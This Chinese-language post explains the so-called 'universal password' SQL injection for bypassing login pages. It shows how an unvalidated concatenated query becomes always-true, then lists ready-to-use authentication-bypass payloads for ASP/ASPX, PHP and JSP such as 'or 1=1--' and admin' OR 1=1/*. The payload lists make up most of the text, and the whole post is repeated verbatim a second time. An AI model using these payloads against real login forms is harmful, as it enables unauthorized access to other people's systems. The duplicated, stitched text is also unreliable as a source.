我们所常说的’or’=’or’万能密码的原理是这样的:
SQL语句sql=”select * from user where username=’”&username&”‘and pass=’”& pass&’” ,当我们用户名和密码都填写’or’=’or’提交的时候,即此时语句中的username和pass都等于’or’=’or’,那么,这条SQL语句就变成了:sql=”select * from user where username=”or’ ‘=”and pass=”or’ ‘=” ,自然也就通过了程序的验证,“万能密码”这个称呼我觉得并不是很恰当,因为万能密码利用的原理就是在后台登陆页面没有对用户输入的内容进行验证,此时程序所用用户输入的数据都合法的,所以这个时候无论是合法的管理员还是非法的入侵者所输入的数据都是被信任的,非法入侵者正是利用这一特点来进行非法登录的。
asp aspx万能密码
’or’=’or’
”or “a”=”a
‘)or(‘a’=’a
or 1=1–
’or 1=1–
a’or’ 1=1–
”or 1=1–
’or’a’=’a
”or”=”a’=’a
’or”=’
’or’=’or’
1 or ‘1’=’1’=1
1 or ‘1’=’1’ or 1=1
‘OR 1=1%00
“or 1=1%00
‘xor
PHP万能密码
‘or 1=1/*
User: something
Pass: ’ OR ‘1’=’1
jsp 万能密码
1’or’1’=’1
admin’ OR 1=1/*
SQL语句sql=”select * from user where username=’”&username&”‘and pass=’”& pass&’” ,当我们用户名和密码都填写’or’=’or’提交的时候,即此时语句中的username和pass都等于’or’=’or’,那么,这条SQL语句就变成了:sql=”select * from user where username=”or’ ‘=”and pass=”or’ ‘=” ,自然也就通过了程序的验证,“万能密码”这个称呼我觉得并不是很恰当,因为万能密码利用的原理就是在后台登陆页面没有对用户输入的内容进行验证,此时程序所用用户输入的数据都合法的,所以这个时候无论是合法的管理员还是非法的入侵者所输入的数据都是被信任的,非法入侵者正是利用这一特点来进行非法登录的。
asp aspx万能密码
’or’=’or’
”or “a”=”a
‘)or(‘a’=’a
or 1=1–
’or 1=1–
a’or’ 1=1–
”or 1=1–
’or’a’=’a
”or”=”a’=’a
’or”=’
’or’=’or’
1 or ‘1’=’1’=1
1 or ‘1’=’1’ or 1=1
‘OR 1=1%00
“or 1=1%00
‘xor
PHP万能密码
‘or 1=1/*
User: something
Pass: ’ OR ‘1’=’1
jsp 万能密码
1’or’1’=’1
admin’ OR 1=1/*